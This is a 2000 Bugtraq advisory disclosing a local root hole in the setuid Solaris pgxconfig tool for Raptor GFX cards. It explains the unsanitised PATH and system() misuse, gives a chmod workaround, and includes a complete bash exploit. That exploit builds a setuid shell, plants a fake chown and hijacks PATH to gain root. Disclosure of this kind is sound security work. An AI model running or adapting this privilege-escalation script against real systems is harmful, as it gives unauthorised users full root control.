>From owner-bugtraq@SECURITYFOCUS.COM Wed Aug 2 11:08:46 2000 Return-Path: Date: Mon, 2 Aug 0100 11:56:57 +0000 Reply-To: suid@SUID.KG Sender: Bugtraq List From: suid@SUID.KG Subject: Local root compromise in PGX Config Sun Sparc Solaris To: BUGTRAQ@SECURITYFOCUS.COM hi guys and gals yeah heres something i have had sitting on the shelf until the vendor sent me a fix. they seem to have done that so here it is. drum roll... --- Start --- suid@suid.kg - Raptor GFX config tool local root vulnerability Short Name: PGXCONFIG-SPARC Software: Raptor GFXtra configuration tool - pgxconfig URL: http://www.techsource.com ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z Version: PGX32 (Raptor GFX) X Window System Support v2.3.1 Platforms: Sun Solaris: 2.5.1 Sparc 2.6 Sparc 7 Sparc 8 Sparc Type: Multiple. Lack of environment sanity checks. Insufficient bounds checking. Insecure use of the /tmp dir. Date: 04 July 2000 Summary: Local users can run arbitrary commands as root. Background: Raptor GFX cards are PCI accelerated graphics adapters suitable for use in Sun Sparc systems (among others). The associated driver and configuration software is distributed for the Sun platform from the techsource.com website. Vulnerability: The configuration tool associated with this product is called pgxconfig and is installed in /usr/sbin mode 4555 by default. Extract from pkgmap: 1 d none sbin 0775 root bin 1 s none sbin/GFXconfig=pgxconfig 1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098 With this command it is possible for any user on the system to change the openwin configuration. The way this program does this is using system("cp"); to copy the existing configuration to a backup before overwriting the configuration with a new file. Anyway, we all know that Solaris's implementation of system() does NOT execute processes with root priviledges when the users uid >= 100. However, this particular version of pgxconfig does a nice setuid(0); for us. So, while we had euid = 0 from being executed as a suid root program, we now have uid = 0 and thus system() will execute whatever its told to, as root. In this particular program, system is used badly and two things are going on. 1. root privileges are not dropped 2. the environment is not sanitised without source I cant show you exactly whats going on in there but the result is obviously insecure. Its worth noting here (and demonstrating in the exploit) that the use of system("cp /whatever /wherever"); isn't the only system() call worth exploiting. I've used the easiest one in my exploit below. Other problems noted but not investigated were multiple command line options lacking proper bounds checking and predictable temp file creation. It would be a good idea for the vendor to perform a complete audit on this product. Exploit: ---------------------------CUT--------------------------- #!/usr/local/bin/bash # TechSource Raptor GFX configurator root exploit # suid@suid.kg # unfortunately a compiler must be installed to use this example # exploit. however there's a million ways around this you know # on my system , gcc isnt in my path PATH=$PATH:/usr/local/bin # build a little prog nothing new here folks echo '#include' > ./x.c echo 'int main(void) { setuid(0); setgid(0); execl ("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c gcc x.c -o foobar rm -f ./x.c # build a substitute chown command. i much prefer this over # regular chown echo "#!/bin/sh" > chown echo "/usr/bin/chown root ./foobar" >> chown echo "/usr/bin/chmod 4755 ./foobar" >> chown chmod 0755 chown # oooh look its the magical fairy path variable export PATH=.:$PATH # heres one way to skin a cat # (theres more, some need valid devices. excercise for the readers) /usr/sbin/pgxconfig -i rm -f chown ./foobar ----------------------------END-------------------------- Fix: No source, no fix. A workaround is: Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both) or at least remove the suid bit. # chmod 0 /usr/sbin/pgxconfig or # chmod 0511 /usr/sbin/pgxconfig Until your vendor can issue a fix. Greets: duke - r0x j00r s0x cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz yowie - elite greet wh0re ratcorpse + par - congrats dudes anyone i met at defcon 8 / black hat briefings Thumbs Down: Network Solutions - assholes http://www.suid.edu/advisories/012.txt --- EOF ---